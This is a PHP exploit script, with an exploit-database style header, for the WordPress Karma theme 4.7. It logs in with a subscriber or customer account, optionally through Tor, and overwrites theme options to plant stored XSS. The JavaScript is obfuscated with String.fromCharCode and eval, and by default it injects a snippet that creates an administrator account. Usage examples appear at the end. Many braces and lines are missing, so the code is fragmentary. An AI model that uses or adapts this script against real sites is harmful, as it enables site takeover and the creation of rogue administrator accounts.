* Exploit Title: Karma Theme Exploit
 * Version: 4.7
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated Options overwrite, Stored XSS
 * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
$options = validateInput($options);
if (!$options){
if ($options['tor'] === true)
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    echo "Checking IPv4 Address\n";
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
    echo "OK...\n";
function logIn(){
    return true;
    global $curl, $options;
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>'', 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
function exploit(){
    global $curl, $options;
    if (!isset($options['f'])){
        $file = 'inject_admin.js';
        $js_code = file_get_contents(dirname(__FILE__).'/'.$file);
    } else {
        $js_code = file_get_contents(realpath($options['f']));
    echo "Injecting JS Code:\n\n";
    echo $js_code."\n\n\n";
    $inject = array();
    for ($i = 0; $i < strlen($js_code); $i++){
        $inject[] = ord($js_code[$i]);
    $inject = 'eval(String.fromCharCode('.implode(',',$inject).'))';
    $data = array('action'=>'of_ajax_post_action', 'type'=>'options', 'data'=>'ka_customcode_body=<script>'.$inject.'</script>');
    echo "Payload ". http_build_query($data) . "\n";
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    echo $resp;
function validateInput($options){
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    if ( !isset($options['u']) ){
        return false;
    if ( !isset($options['p']) ){
        return false;
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    if (!isset($options['m']) || !in_array($options['m'], array('wpc','r','i','t') ) ){
        return false;
    if ($options['m'] == 'r' && !isset($options['f'])){
        return false;
    $options['tor'] = isset($options['tor']);
    return $options;
function showHelp(){
    global $argv;
    $help = <<<EOD
    Karma Theme Exploit (Theme options overwrite)
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m i -f [FILE]
       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
       [TARGET_URL] http://localhost/wordpress/
       [MODE] i - Inject JavaScript into the body tag.
       [FILE] You can provide a file with the JS code that you want to include in the <body>
              By default it injects an Admin creator JS snippet called inject_admin.js
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i -f custom_xss.js
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License
    echo $help."\n\n";